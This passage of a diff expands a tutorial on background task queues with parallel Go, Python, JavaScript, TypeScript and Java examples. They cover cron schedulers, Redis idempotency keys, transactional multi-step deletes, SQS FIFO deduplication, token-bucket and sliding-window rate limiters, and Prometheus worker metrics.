+        // consumer, and anything unacked can be reclaimed by another.
+        container.receive(
+            Consumer.from(EmailTaskHandler.GROUP, "worker-" + UUID.randomUUID()),
+            StreamOffset.create(EmailTaskHandler.STREAM, ReadOffset.lastConsumed()),
+            handler);
+
+        container.start();
+        return container;
+    }
+}
+
+// Priority: one container per queue, sized by importance, exactly as the
+// Go version weights its queues 6 / 3 / 1.
+//
+// Higher-level options exist if you would rather not hold the stream
+// yourself: JobRunr (annotation-driven, SQL/Mongo-backed), Spring Batch
+// for chunked bulk jobs, or Spring Cloud AWS for @SqsListener.
+```
+
+### Recurring (cron-style) tasks
+
+Some work is not triggered by a user at all: a weekly report, a nightly cleanup. Every queue ships a **scheduler**, a small separate process that enqueues tasks on a cron expression. It does not run them; it only produces them, and your ordinary workers pick them up.
+
+<Callout type="info" title="Run exactly one scheduler">
+Workers scale horizontally; schedulers do not. Run two scheduler replicas and every recurring task is enqueued twice. Keep it at one replica, or use a scheduler that takes a lock (Asynq's `PeriodicTaskManager`, Celery Beat with a shared store, BullMQ's repeatable jobs, which are deduplicated by Redis itself).
+</Callout>
+
+Go Python JavaScript TypeScript Java
+
+weekly report every Sunday at midnight; cleanup on the 1st of each month
+
+```go title="scheduler/main.go / Go + Asynq Scheduler"
 // scheduler/main.go, Cron-style recurring tasks
 package main
 
@@ -687,12 +1030,9 @@ func main() {
         log.Fatal(err)
     }
 }
-Go
 ```
 
-### Python: Celery Beat (Recurring Tasks)
-
-```text
+```python title="celery_config.py / Python + Celery Beat"
 # celery_config.py, Celery Beat schedule
 from celery.schedules import crontab
 
@@ -708,7 +1048,90 @@ CELERYBEAT_SCHEDULE = {
         'schedule': crontab(hour=3, minute=0, day_of_month='1'),
     },
 }
-Python / Celery Beat
+
+# Beat is its own process, separate from the workers:
+#   celery -A tasks beat --loglevel=info
+```
+
+```js title="scheduler.js / Node 20+ + BullMQ repeatable jobs"
+// BullMQ has no separate scheduler process: a repeatable job is just a
+// job with a cron pattern, and Redis deduplicates it by repeat key. That
+// makes running this file on every replica harmless.
+import { Queue } from 'bullmq'
+
+const reports = new Queue('reports', { connection })
+
+// Send weekly report every Sunday at midnight
+await reports.add('weekly', null, {
+  repeat: { pattern: '0 0 * * 0', tz: 'UTC' },
+  jobId: 'report:weekly', // stable id, re-adding it does not duplicate
+})
+
+// Cleanup orphan sessions every 1st of the month
+await reports.add('sessionCleanup', null, {
+  repeat: { pattern: '0 3 1 * *', tz: 'UTC' },
+  jobId: 'sessions:cleanup',
+})
+
+// Always set `tz`. A schedule that silently follows the server's local
+// time will shift by an hour twice a year, and the bug surfaces months
+// later as "the Sunday report went out on Saturday night".
+```
+
+```ts title="scheduler.ts / TypeScript 5+ + BullMQ repeatable jobs"
+import { Queue } from 'bullmq'
+
+interface Schedule {
+  name: string
+  pattern: string
+  jobId: string
+}
+
+// Listing the schedules as DATA rather than as a sequence of calls is what
+// makes them reviewable: one array to read in a PR, and one loop that
+// cannot forget the tz or the stable jobId on the entry someone adds next.
+const SCHEDULES: Schedule[] = [
+  { name: 'weekly', pattern: '0 0 * * 0', jobId: 'report:weekly' },
+  { name: 'sessionCleanup', pattern: '0 3 1 * *', jobId: 'sessions:cleanup' },
+]
+
+const reports = new Queue('reports', { connection })
+
+for (const { name, pattern, jobId } of SCHEDULES) {
+  await reports.add(name, null, { repeat: { pattern, tz: 'UTC' }, jobId })
+}
+```
+
+```java title="SchedulerConfig.java / Java 17+ + Spring @Scheduled"
+@Configuration
+@EnableScheduling
+public class SchedulerConfig {
+
+    private final EmailTaskProducer producer;
+
+    SchedulerConfig(EmailTaskProducer producer) {
+        this.producer = producer;
+    }
+
+    // Send weekly report every Sunday at midnight.
+    // Note the six fields: Spring's cron starts with SECONDS, so the
+    // five-field Unix expression "0 0 * * 0" becomes "0 0 0 * * SUN".
+    @Scheduled(cron = "0 0 0 * * SUN", zone = "UTC")
+    void enqueueWeeklyReport() {
+        // The scheduler only ENQUEUES; an ordinary worker runs it.
+        producer.enqueue("report:weekly", null);
+    }
+
+    // Cleanup orphan sessions every 1st of the month
+    @Scheduled(cron = "0 0 3 1 * *", zone = "UTC")
+    void enqueueSessionCleanup() {
+        producer.enqueue("sessions:cleanup", null);
+    }
+}
+
+// @Scheduled fires on EVERY instance, so with two replicas every task is
+// enqueued twice. In a multi-replica deployment take a lock first, with
+// ShedLock (@SchedulerLock) or Quartz in clustered mode.
 ```
 
 12
@@ -743,7 +1166,45 @@ If the queue grows faster than workers consume, you have backpressure. Solutions
 
 Assign a unique key to each task when it is created (usually a UUID or a hash of the input). Before doing any work, the handler checks if that key has already been successfully processed. If yes, it returns early without re-doing the work.
 
-```python
+Go Python JavaScript TypeScript Java
+
+claim the key first; only the winner does the work
+
+```go title="email_handler.go / Go + go-redis + Asynq"
+// Go, Idempotency key pattern with Redis
+func (h *EmailHandler) HandleSendVerificationEmail(
+    ctx context.Context, t *asynq.Task,
+) error {
+    var p tasks.EmailPayload
+    if err := json.Unmarshal(t.Payload(), &p); err != nil {
+        return fmt.Errorf("json.Unmarshal: %w: %w", err, asynq.SkipRetry)
+    }
+
+    // Build idempotency key from task inputs
+    key := fmt.Sprintf("idem:verify_email:%s:%s", p.UserID, p.Token)
+
+    // SetNX = SET only if Not eXists, with a 1-hour expiry.
+    // acquired is true only for the FIRST execution.
+    acquired, err := h.rdb.SetNX(ctx, key, "done", time.Hour).Result()
+    if err != nil {
+        // Redis is unreachable, so we cannot tell a duplicate from a
+        // first run. Retry rather than risk a second email.
+        return fmt.Errorf("idempotency check: %w", err)
+    }
+    if !acquired {
+        return nil // Already processed, ACK cleanly (idempotent return)
+    }
+
+    // First time, actually send the email
+    if err := h.emailSvc.SendVerification(ctx, p.Email, p.Token); err != nil {
+        h.rdb.Del(ctx, key) // release the key so the next retry can try again
+        return fmt.Errorf("emailSvc.SendVerification: %w", err)
+    }
+    return nil
+}
+```
+
+```python title="tasks.py / Python + redis-py + Celery"
 # Python, Idempotency key pattern with Redis
 import redis
 import hashlib
@@ -769,7 +1230,92 @@ def send_verification_email(self, user_id: str, email: str, token: str):
         # Delete the key so next retry can attempt again
         r.delete(key)
         raise self.retry(exc=exc, countdown=60 * 2 ** self.request.retries)
-Python
+```
+
+```js title="worker.js / Node 20+ + node-redis + BullMQ"
+// Node, Idempotency key pattern with Redis
+new Worker('email', async (job) => {
+  const { userId, email, token } = job.data
+
+  // Build idempotency key from task inputs
+  const key = `idem:verify_email:${userId}:${token}`
+
+  // NX = set only if Not eXists; EX = expire after 1 hour.
+  // set() returns 'OK' on the FIRST execution, and null if already done.
+  const acquired = await redis.set(key, 'done', { NX: true, EX: 3600 })
+  if (acquired === null) {
+    return { status: 'already_sent' } // skip silently (idempotent return)
+  }
+
+  // First time, actually send the email
+  try {
+    await sendEmailViaProvider(email, token)
+  } catch (err) {
+    await redis.del(key) // delete the key so the next retry can attempt again
+    throw err // throwing is what schedules the retry
+  }
+}, { connection })
+```
+
+```ts title="worker.ts / TypeScript 5+ + node-redis + BullMQ"
+// Worth naming the gap in this shape before you rely on it: if the process
+// dies AFTER the SET NX but BEFORE the send lands, the key is held and the
+// retry skips the email entirely. The one-hour TTL is what bounds the
+// damage. The stronger fix is the one chapter 07 uses for payments, store
+// the RESULT under the key instead of a bare "done" marker, so a duplicate
+// can return the original outcome rather than guessing.
+async function handler(job: Job<EmailJob>): Promise<{ status: string }> {
+  const { userId, email, token } = job.data
+  const key = `idem:verify_email:${userId}:${token}`
+
+  const acquired: string | null = await redis.set(key, 'pending', { NX: true, EX: 3600 })
+  if (acquired === null) {
+    return { status: 'already_sent' } // skip silently (idempotent return)
+  }
+
+  try {
+    const messageId = await sendEmailViaProvider(email, token)
+    // Overwrite the claim with the real result, still under the same TTL.
+    await redis.set(key, JSON.stringify({ messageId }), { EX: 3600 })
+    return { status: 'sent' }
+  } catch (err) {
+    await redis.del(key) // let the next retry attempt again
+    throw err
+  }
+}
+```
+
+```java title="EmailTaskHandler.java / Java 17+ + Spring Data Redis"
+// Java, Idempotency key pattern with Redis
+@Override
+public void onMessage(MapRecord<String, String, String> record) {
+    EmailPayload p = parse(record); // as in the consumer example above
+
+    // Build idempotency key from task inputs
+    String key = "idem:verify_email:%s:%s".formatted(p.userId(), p.token());
+
+    // setIfAbsent IS SET NX, and the Duration is the EX. It returns TRUE
+    // only for the FIRST execution, FALSE if an earlier attempt got there.
+    Boolean acquired = redis.opsForValue()
+        .setIfAbsent(key, "done", Duration.ofHours(1));
+
+    if (!Boolean.TRUE.equals(acquired)) {
+        // Already processed, ACK cleanly (idempotent return). Note the
+        // Boolean.TRUE.equals: `acquired` is a nullable Boolean, and
+        // unboxing a null here would throw instead of skipping.
+        redis.opsForStream().acknowledge(STREAM, GROUP, record.getId());
+        return;
+    }
+
+    // First time, actually send the email
+    try {
+        emailSvc.sendVerification(p.email(), p.token());
+        redis.opsForStream().acknowledge(STREAM, GROUP, record.getId());
+    } catch (RuntimeException e) {
+        redis.delete(key); // release the key so the redelivery can try again
+        log.warn("send failed; leaving unacked for redelivery", e);
+    }
+}
 ```
 
 ### Pattern 2: Database Transaction + Upsert
@@ -789,14 +1335,17 @@ VALUES ($1, true, NOW())
 ON CONFLICT (user_id) DO UPDATE
   SET email_verified = EXCLUDED.email_verified,
       updated_at = EXCLUDED.updated_at;
-SQL
 ```
 
 ### Pattern 3: Full Transaction Rollback (for complex tasks)
 
 For multi-step tasks (like account deletion) that touch many tables, wrap the entire task in a database transaction. If any step fails, the transaction rolls back completely, leaving the database in a clean state for the next retry attempt.
 
-```go
+Go Python JavaScript TypeScript Java
+
+every write commits together, or none of them do
+
+```go title="account_handler.go / Go + Asynq"
 // Go, Idempotent multi-step task with full transaction rollback
 func (h *AccountHandler) HandleDeleteAccount(ctx context.Context, t *asynq.Task) error {
     var p DeleteAccountPayload
@@ -824,14 +1373,128 @@ func (h *AccountHandler) HandleDeleteAccount(ctx context.Context, t *asynq.Task)
         return nil // all steps succeeded -> commit -> ACK
     })
 }
-Go
+```
+
+```python title="tasks.py / Python + SQLAlchemy + Celery"
+# Python, Idempotent multi-step task with full transaction rollback
+@app.task(bind=True, max_retries=5)
+def delete_account(self, user_id: str):
+    # Check if already deleted (idempotency guard)
+    if not db.user_exists(user_id):
+        return  # already deleted on a previous attempt, ACK cleanly
+
+    try:
+        # session.begin() COMMITs on a clean exit and ROLLBACKs on any
+        # exception, so the whole multi-step delete is one unit.
+        with Session(engine) as session, session.begin():
+            delete_user_projects(session, user_id)
+            delete_user_sessions(session, user_id)
+            delete_user_assets(session, user_id)
+            delete_user_account(session, user_id)
+    except SQLAlchemyError as exc:
+        # Nothing was written, so the retry starts from a clean database
+        raise self.retry(exc=exc, countdown=60 * 2 ** self.request.retries)
+```
+
+```js title="worker.js / Node 20+ + node-postgres + BullMQ"
+// Node, Idempotent multi-step task with full transaction rollback
+new Worker('account', async (job) => {
+  const { userId } = job.data
+
+  // Check if already deleted (idempotency guard)
+  if (!(await db.userExists(userId))) {
+    return // already deleted on a previous attempt, ACK cleanly
+  }
+
+  // Wrap all DB writes in a single transaction, on ONE connection
+  const tx = await pool.connect()
+  try {
+    await tx.query('BEGIN')
+    await deleteUserProjects(tx, userId)
+    await deleteUserSessions(tx, userId)
+    await deleteUserAssets(tx, userId)
+    await deleteUserAccount(tx, userId)
+    await tx.query('COMMIT') // all steps succeeded -> ACK
+  } catch (err) {
+    await tx.query('ROLLBACK') // full rollback; task retried from scratch
+    throw err
+  } finally {
+    tx.release()
+  }
+}, { connection })
+```
+
+```ts title="worker.ts / TypeScript 5+ + node-postgres + BullMQ"
+// The type on this array is doing real work: every step takes a `tx`, so
+// a function that does NOT take one cannot be added to the list. That
+// matters more than it looks, because a rollback only undoes DATABASE
+// writes. Slip an email send or an S3 delete in here and the retry does
+// it a second time with nothing to roll back.
+const steps: Array<(tx: PoolClient, userId: string) => Promise<void>> = [
+  deleteUserProjects,
+  deleteUserSessions,
+  deleteUserAssets,
+  deleteUserAccount,
+]
+
+async function handleDeleteAccount(job: Job<{ userId: string }>): Promise<void> {
+  const { userId } = job.data
+
+  // Check if already deleted (idempotency guard)
+  if (!(await db.userExists(userId))) {
+    return // already deleted on a previous attempt, ACK cleanly
+  }
+
+  // withTransaction (chapter 08) commits on return, rolls back on throw
+  await withTransaction(pool, async (tx) => {
+    for (const step of steps) {
+      await step(tx, userId) // any throw -> full rollback -> retry from scratch
+    }
+  })
+}
+```
+
+```java title="AccountTaskHandler.java / Java 17+ + Spring"
+// Java, Idempotent multi-step task with full transaction rollback
+@Service
+public class AccountTaskHandler {
+
+    // @Transactional wraps the WHOLE method: every write below commits
+    // together, or a thrown exception rolls all of them back and the
+    // redelivered task starts against a clean database.
+    @Transactional
+    public void handleDeleteAccount(DeleteAccountPayload p) {
+        // Check if already deleted (idempotency guard)
+        if (!db.userExists(p.userId())) {
+            return; // already deleted on a previous attempt, ACK cleanly
+        }
+
+        db.deleteUserProjects(p.userId());
+        db.deleteUserSessions(p.userId());
+        db.deleteUserAssets(p.userId());
+        db.deleteUserAccount(p.userId());
+        // returning commits; any RuntimeException triggers a full rollback
+    }
+}
+
+// Both chapter 08 traps are genuinely dangerous here, not academic:
+//  1. The proxy. Calling handleDeleteAccount() from another method of
+//     THIS class runs it with NO transaction at all, so a failure halfway
+//     down leaves an account that is half deleted and cannot be retried.
+//  2. Checked exceptions do not roll back by default, which commits the
+//     partial delete. Be explicit:
+//     @Transactional(rollbackFor = Exception.class)
 ```
 
 ### Pattern 4: Exactly-Once via SQS FIFO Deduplication
 
 SQS FIFO queues accept a `MessageDeduplicationId`. Any message with the same ID sent within a 5-minute window is silently dropped. This is broker-level idempotency, the handler never even sees the duplicate.
 
-```text
+Go Python JavaScript TypeScript Java
+
+the broker drops the duplicate; your handler never sees it
+
+```go title="producer.go / Go + AWS SDK v2"
 // Go, SQS FIFO with content-based deduplication
 client.SendMessage(ctx, &sqs.SendMessageInput{
     QueueUrl:               aws.String("https://sqs.us-east-1.amazonaws.com/123/orders.fifo"),
@@ -840,7 +1503,69 @@ client.SendMessage(ctx, &sqs.SendMessageInput{
     MessageDeduplicationId: aws.String(orderID),           // unique per business event
 })
 // Sending the same orderID twice within 5 min -> second is silently dropped by SQS
-Go / AWS SQS FIFO
+```
+
+```python title="producer.py / Python + boto3"
+# Python, SQS FIFO with deduplication
+import boto3
+
+sqs = boto3.client("sqs", region_name="us-east-1")
+
+sqs.send_message(
+    QueueUrl="https://sqs.us-east-1.amazonaws.com/123/orders.fifo",
+    MessageBody=payload,
+    MessageGroupId="order-processing",   # ordering group
+    MessageDeduplicationId=order_id,     # unique per business event
+)
+# Sending the same order_id twice within 5 min -> second is silently dropped
+```
+
+```js title="producer.js / Node 20+ + @aws-sdk/client-sqs"
+// Node, SQS FIFO with deduplication
+import { SQSClient, SendMessageCommand } from '@aws-sdk/client-sqs'
+
+const sqs = new SQSClient({ region: 'us-east-1' })
+
+await sqs.send(new SendMessageCommand({
+  QueueUrl: 'https://sqs.us-east-1.amazonaws.com/123/orders.fifo',
+  MessageBody: payload,
+  MessageGroupId: 'order-processing', // ordering group
+  MessageDeduplicationId: orderId,    // unique per business event
+}))
+// Sending the same orderId twice within 5 min -> second is silently dropped
+```
+
+```ts title="producer.ts / TypeScript 5+ + @aws-sdk/client-sqs"
+import { SQSClient, SendMessageCommand } from '@aws-sdk/client-sqs'
+
+const sqs = new SQSClient({ region: 'us-east-1' })
+
+// The dedup id has to come from the BUSINESS event, never from the
+// attempt: a randomUUID() per send makes every retry look like a new
+// message and deduplicates nothing. Typing it as the order id and not as
+// a bare `string` is a cheap way to keep that honest.
+export async function enqueueOrder(orderId: OrderId, payload: string): Promise<void> {
+  await sqs.send(new SendMessageCommand({
+    QueueUrl: process.env.ORDERS_QUEUE_URL,
+    MessageBody: payload,
+    MessageGroupId: 'order-processing', // ordering group
+    MessageDeduplicationId: orderId,    // unique per business event
+  }))
+}
+// Sending the same orderId twice within 5 min -> second is silently dropped
+```
+
+```java title="Producer.java / Java 17+ + AWS SDK v2"
+// Java, SQS FIFO with deduplication
+SqsClient sqs = SqsClient.builder().region(Region.US_EAST_1).build();
+
+sqs.sendMessage(SendMessageRequest.builder()
+    .queueUrl("https://sqs.us-east-1.amazonaws.com/123/orders.fifo")
+    .messageBody(payload)
+    .messageGroupId("order-processing") // ordering group
+    .messageDeduplicationId(orderId)    // unique per business event
+    .build());
+// Sending the same orderId twice within 5 min -> second is silently dropped
 ```
 
 Rule of thumb
@@ -863,9 +1588,77 @@ Sliding Window
 
 Count requests in the last N seconds using a sliding time window. More accurate than token bucket for strict rate compliance. Redis implementation: sorted sets with timestamps as scores.
 
-### Token Bucket in Python (Redis-backed)
+### Token Bucket (Redis-backed)
 
-```python
+The Lua script below is identical in all five tabs, and that is the whole trick: Redis executes a script atomically, so the read-refill-write cycle cannot interleave with another worker's. Do the arithmetic in your own language instead, and you have rebuilt the lost-update race from chapter 08, at a hundred workers a second.
+
+Go Python JavaScript TypeScript Java
+
+one atomic script; five ways of calling it
+
+```go title="rate/token_bucket.go / Go + go-redis"
+// rate/token_bucket.go, Redis token bucket implementation
+package rate
+
+// Loaded once; go-redis sends EVALSHA and only falls back to the full
+// body if Redis has not seen the script before.
+var tokenBucketScript = redis.NewScript(`
+local key = KEYS[1]
+local capacity = tonumber(ARGV[1])
+local refill_rate = tonumber(ARGV[2])
+local now = tonumber(ARGV[3])
+
+local bucket = redis.call('HMGET', key, 'tokens', 'last_refill')
+local tokens = tonumber(bucket[1]) or capacity
+local last_refill = tonumber(bucket[2]) or now
+
+-- Refill tokens based on time elapsed
+local elapsed = now - last_refill
+tokens = math.min(capacity, tokens + elapsed * refill_rate)
+
+if tokens >= 1 then
+    tokens = tokens - 1
+    redis.call('HMSET', key, 'tokens', tokens, 'last_refill', now)
+    redis.call('EXPIRE', key, 3600)
+    return 1
+end
+return 0
+`)
+
+type TokenBucketLimiter struct {
+    rdb        *redis.Client
+    key        string  // e.g. "ratelimit:resend_emails"
+    capacity   int     // max burst (e.g. 100)
+    refillRate float64 // tokens per second (e.g. 10)
+}
+
+// Acquire reports whether a token was taken; false means rate limited.
+func (l *TokenBucketLimiter) Acquire(ctx context.Context) (bool, error) {
+    now := float64(time.Now().UnixMicro()) / 1e6
+    got, err := tokenBucketScript.Run(ctx, l.rdb,
+        []string{l.key}, l.capacity, l.refillRate, now).Int()
+    if err != nil {
+        return false, err
+    }
+    return got == 1, nil
+}
+
+// Usage inside an Asynq handler
+func (h *EmailHandler) HandleSendEmail(ctx context.Context, t *asynq.Task) error {
+    ok, err := h.limiter.Acquire(ctx)
+    if err != nil {
+        return err
+    }
+    if !ok {
+        // Rate limited. Any non-nil error re-queues the task with backoff,
+        // so this costs a retry slot but never drops the work.
+        return errors.New("rate limited, retrying")
+    }
+    return h.doSendEmail(ctx, t)
+}
+```
+
+```python title="rate_limiter.py / Python + redis-py + Celery"
 # rate_limiter.py, Redis token bucket implementation
 import time
 import redis
@@ -917,12 +1710,144 @@ def send_email_task(self, email, token):
         # Rate limited, retry after a short delay (not counted as failure)
         raise self.retry(countdown=1, max_retries=60)  # retry every 1s up to 60 times
     _do_send_email(email, token)
-Python
 ```
 
-### Sliding Window Rate Limiter in Go
+```js title="rateLimiter.js / Node 20+ + node-redis + BullMQ"
+// rateLimiter.js, Redis token bucket implementation
+const TOKEN_BUCKET_LUA = `
+local key = KEYS[1]
+local capacity = tonumber(ARGV[1])
+local refill_rate = tonumber(ARGV[2])
+local now = tonumber(ARGV[3])
 
-```go
+local bucket = redis.call('HMGET', key, 'tokens', 'last_refill')
+local tokens = tonumber(bucket[1]) or capacity
+local last_refill = tonumber(bucket[2]) or now
+
+-- Refill tokens based on time elapsed
+local elapsed = now - last_refill
+tokens = math.min(capacity, tokens + elapsed * refill_rate)
+
+if tokens >= 1 then
+    tokens = tokens - 1
+    redis.call('HMSET', key, 'tokens', tokens, 'last_refill', now)
+    redis.call('EXPIRE', key, 3600)
+    return 1
+end
+return 0
+`
+
+export class TokenBucketRateLimiter {
+  constructor(redis, key, capacity, refillRate) {
+    this.redis = redis
+    this.key = key                // e.g. "ratelimit:resend_emails"
+    this.capacity = capacity      // max burst (e.g. 100)
+    this.refillRate = refillRate  // tokens per second (e.g. 10)
+  }
+
+  // Returns true if a token was acquired, false if rate limited.
+  async acquire() {
+    const now = Date.now() / 1000
+    const result = await this.redis.eval(TOKEN_BUCKET_LUA, {
+      keys: [this.key],
+      arguments: [String(this.capacity), String(this.refillRate), String(now)],
+    })
+    return result === 1
+  }
+}
+
+// Usage inside a BullMQ worker
+const limiter = new TokenBucketRateLimiter(redis, 'ratelimit:resend', 100, 10)
+
+new Worker('email', async (job) => {
+  if (!(await limiter.acquire())) {
+    throw new Error('rate limited') // throwing re-queues with backoff
+  }
+  await doSendEmail(job.data)
+}, { connection })
+
+// BullMQ also ships a built-in limiter that PAUSES the worker instead of
+// failing jobs, which is usually the better shape, no retry budget burned:
+//   new Worker('email', fn, { connection, limiter: { max: 10, duration: 1000 } })
+// Its scope is the queue, though, so a second unrelated queue hitting the
+// same provider is not counted. A shared bucket like the one above is.
+```
+
+```ts title="rateLimiter.ts / TypeScript 5+ + node-redis"
+import type { RedisClientType } from 'redis'
+
+// Two details decide whether this holds up in production:
+//
+//  1. `now` comes from the WORKER's clock, and ten pods do not agree to
+//     the millisecond. If the refill has to be exact across machines,
+//     take the time from Redis (`TIME`) and pass that instead.
+//  2. It must stay ONE eval. Reading the bucket, computing the refill in
+//     TypeScript, and writing it back is the chapter 08 lost-update race
+//     wearing a different hat, and it leaks tokens under real load.
+export class TokenBucketRateLimiter {
+  constructor(
+    private readonly redis: RedisClientType,
+    private readonly key: string,        // e.g. "ratelimit:resend_emails"
+    private readonly capacity: number,   // max burst (e.g. 100)
+    private readonly refillRate: number, // tokens per second (e.g. 10)
+  ) {}
+
+  /** Returns true if a token was acquired, false if rate limited. */
+  async acquire(): Promise<boolean> {
+    const now = Date.now() / 1000
+    const result = (await this.redis.eval(TOKEN_BUCKET_LUA, {
+      keys: [this.key],
+      arguments: [String(this.capacity), String(this.refillRate), String(now)],
+    })) as number
+    return result === 1
+  }
+}
+```
+
+```java title="TokenBucketRateLimiter.java / Java 17+ + Spring Data Redis"
+@Component
+public class TokenBucketRateLimiter {
+
+    // Same Lua script, kept in src/main/resources/token_bucket.lua.
+    // Spring caches its SHA and calls EVALSHA, so the body is not resent.
+    private static final RedisScript<Long> SCRIPT = RedisScript.of(
+        new ClassPathResource("token_bucket.lua"), Long.class);
+
+    private final StringRedisTemplate redis;
+
+    TokenBucketRateLimiter(StringRedisTemplate redis) {
+        this.redis = redis;
+    }
+
+    /** Returns true if a token was acquired, false if rate limited. */
+    public boolean acquire(String key, int capacity, double refillRate) {
+        double now = System.currentTimeMillis() / 1000.0;
+        Long result = redis.execute(SCRIPT, List.of(key),
+            String.valueOf(capacity), String.valueOf(refillRate), String.valueOf(now));
+        return Long.valueOf(1L).equals(result);
+    }
+}
+
+// Usage inside the stream handler
+if (!limiter.acquire("ratelimit:resend", 100, 10)) {
+    // Rate limited: deliberately do NOT ack. The message stays pending
+    // and gets reclaimed later, which is this broker's version of a retry.
+    return;
+}
+doSendEmail(payload);
+
+// Resilience4j ships a RateLimiter too, but its scope is ONE JVM. That is
+// the wrong scope here: ten worker pods each allowing 100/s is 1000/s
+// arriving at the provider. A shared limit has to live in Redis.
+```
+
+### Sliding Window Rate Limiter
+
+Go Python JavaScript TypeScript Java
+
+a sorted set of timestamps; count what falls inside the window
+
+```go title="rate/sliding_window.go / Go + go-redis"
 // rate/sliding_window.go, Redis sorted-set sliding window
 package rate
 
@@ -968,7 +1893,148 @@ func (h *EmailHandler) HandleSendEmail(ctx context.Context, t *asynq.Task) error
     }
     return h.doSendEmail(ctx, t)
 }
-Go
+```
+
+```python title="sliding_window.py / Python + redis-py + Celery"
+# sliding_window.py, Redis sorted-set sliding window
+import time
+
+
+class SlidingWindowLimiter:
+    def __init__(self, redis_client, key: str, limit: int, window_seconds: float):
+        self.r = redis_client
+        self.key = key
+        self.limit = limit            # max requests
+        self.window = window_seconds  # time window
+
+    def allow(self) -> bool:
+        now_us = int(time.time() * 1_000_000)
+        window_start = now_us - int(self.window * 1_000_000)
+
+        pipe = self.r.pipeline()
+        # Remove entries older than the window
+        pipe.zremrangebyscore(self.key, 0, window_start)
+        # Count entries in current window
+        pipe.zcard(self.key)
+        # Add current request timestamp as a member
+        pipe.zadd(self.key, {str(now_us): now_us})
+        pipe.expire(self.key, int(self.window * 2))
+        _, count, _, _ = pipe.execute()
+
+        return count < self.limit
+
+
+# Usage inside a Celery task
+@app.task(bind=True, max_retries=60)
+def send_email_task(self, email, token):
+    if not limiter.allow():
+        raise self.retry(countdown=1)  # rate limited, not a failure
+    _do_send_email(email, token)
+```
+
+```js title="slidingWindow.js / Node 20+ + node-redis + BullMQ"
+// slidingWindow.js, Redis sorted-set sliding window
+export class SlidingWindowLimiter {
+  constructor(redis, key, limit, windowMs) {
+    this.redis = redis
+    this.key = key
+    this.limit = limit        // max requests
+    this.windowMs = windowMs  // time window
+  }
+
+  async allow() {
+    const now = Date.now() * 1000 // microseconds, used as the score
+    const windowStart = now - this.windowMs * 1000
+
+    const [, count] = await this.redis
+      .multi()
+      // Remove entries older than the window
+      .zRemRangeByScore(this.key, 0, windowStart)
+      // Count entries in current window
+      .zCard(this.key)
+      // Add current request timestamp as a member
+      .zAdd(this.key, { score: now, value: String(now) })
+      .expire(this.key, Math.ceil((this.windowMs * 2) / 1000))
+      .exec()
+
+    return count < this.limit
+  }
+}
+```
+
+```ts title="slidingWindow.ts / TypeScript 5+ + node-redis"
+// Two behaviours of this algorithm that are easy to miss, and both are in
+// the Go version above too:
+//
+//  1. The count is read BEFORE this request's own entry is added, so the
+//     effective ceiling is limit + 1 in flight. Either compare against
+//     `limit - 1`, or move the ZADD ahead of the ZCARD. Choose one on
+//     purpose, because drifting between the two across services is how a
+//     documented "100/s" quietly becomes 101/s at the provider.
+//  2. An entry is added even when the request is REJECTED. A caller that
+//     keeps hammering a limited endpoint therefore keeps its own window
+//     permanently full and never recovers. If that is not what you want,
+//     only ZADD on the allowed path.
+export class SlidingWindowLimiter {
+  constructor(
+    private readonly redis: RedisClientType,
+    private readonly key: string,
+    private readonly limit: number,    // max requests
+    private readonly windowMs: number, // time window
+  ) {}
+
+  async allow(): Promise<boolean> {
+    const now = Date.now() * 1000
+    const windowStart = now - this.windowMs * 1000
+
+    const results = await this.redis
+      .multi()
+      .zRemRangeByScore(this.key, 0, windowStart)
+      .zCard(this.key)
+      .expire(this.key, Math.ceil((this.windowMs * 2) / 1000))
+      .exec()
+
+    const count = results[1] as number
+    if (count >= this.limit) {
+      return false // rejected, and deliberately NOT recorded
+    }
+
+    await this.redis.zAdd(this.key, { score: now, value: String(now) })
+    return true
+  }
+}
+```
+
+```java title="SlidingWindowLimiter.java / Java 17+ + Spring Data Redis"
+@Component
+public class SlidingWindowLimiter {
+    private final StringRedisTemplate redis;
+
+    SlidingWindowLimiter(StringRedisTemplate redis) {
+        this.redis = redis;
+    }
+
+    public boolean allow(String key, int limit, Duration window) {
+        long nowMicros = Instant.now().toEpochMilli() * 1_000L;
+        long windowStart = nowMicros - window.toMillis() * 1_000L;
+
+        // Remove entries older than the window
+        redis.opsForZSet().removeRangeByScore(key, 0, windowStart);
+        // Count entries in current window
+        Long count = redis.opsForZSet().zCard(key);
+        // Add current request timestamp as a member
+        redis.opsForZSet().add(key, String.valueOf(nowMicros), nowMicros);
+        redis.expire(key, window.multipliedBy(2));
+
+        return count != null && count < limit;
+    }
+}
+
+// Written plainly like this it is four round trips AND four separate
+// moments: another worker can slip an entry in between the ZCARD and the
+// ZADD. Pipeline it with executePipelined, or move the whole sequence
+// into a Lua script the way the token bucket does. At low rates you will
+// never notice; at the rates that make you reach for a limiter, you will.
 ```
 
 <Callout type="info" title="Asynq Built-In Rate Limiting">
@@ -989,9 +2055,76 @@ Background tasks fail silently unless you've built observability into the system
 
 ### Step 1: Instrument Your Workers
 
-Every worker exposes a `/metrics` HTTP endpoint in Prometheus text format. The `prometheus_client` library (Python) or `prometheus/client_golang` (Go) handles this automatically.
+Every worker exposes a `/metrics` HTTP endpoint in Prometheus text format, and every ecosystem has a client that does the formatting for you: `prometheus_client` in Python, `prometheus/client_golang` in Go, `prom-client` in Node, and Micrometer (via Spring Boot Actuator) in Java. Four metrics carry almost all of the value, a **counter** of tasks by status, a **histogram** of durations, a **gauge** of queue depth, and a **counter** of retries.
 
-```python
+Go Python JavaScript TypeScript Java
+
+four metrics, and one wrapper that fills three of them
+
+```go title="metrics/metrics.go / Go + client_golang"
+// Go, Full metrics instrumentation for a worker process
+package metrics
+
+// -- Define metrics ---------------------------------------------
+var (
+    TaskTotal = promauto.NewCounterVec(prometheus.CounterOpts{
+        Name: "worker_tasks_total",
+        Help: "Total tasks processed",
+    }, []string{"task_name", "status"}) // labels: status=success|failure
+
+    TaskDuration = promauto.NewHistogramVec(prometheus.HistogramOpts{
+        Name:    "worker_task_duration_seconds",
+        Help:    "Task processing duration",
+        Buckets: []float64{.01, .05, .1, .5, 1, 5, 10, 30}, // bucket boundaries
+    }, []string{"task_name"})
+
+    QueueDepth = promauto.NewGaugeVec(prometheus.GaugeOpts{
+        Name: "worker_queue_depth",
+        Help: "Current tasks waiting in queue",
+    }, []string{"queue_name"})
+
+    RetryCount = promauto.NewCounterVec(prometheus.CounterOpts{
+        Name: "worker_task_retries_total",
+        Help: "Number of task retries",
+    }, []string{"task_name"})
+)
+
+// -- Middleware to wrap any handler with metrics -----------------
+// asynq.MiddlewareFunc is the same shape as the Python decorator: it
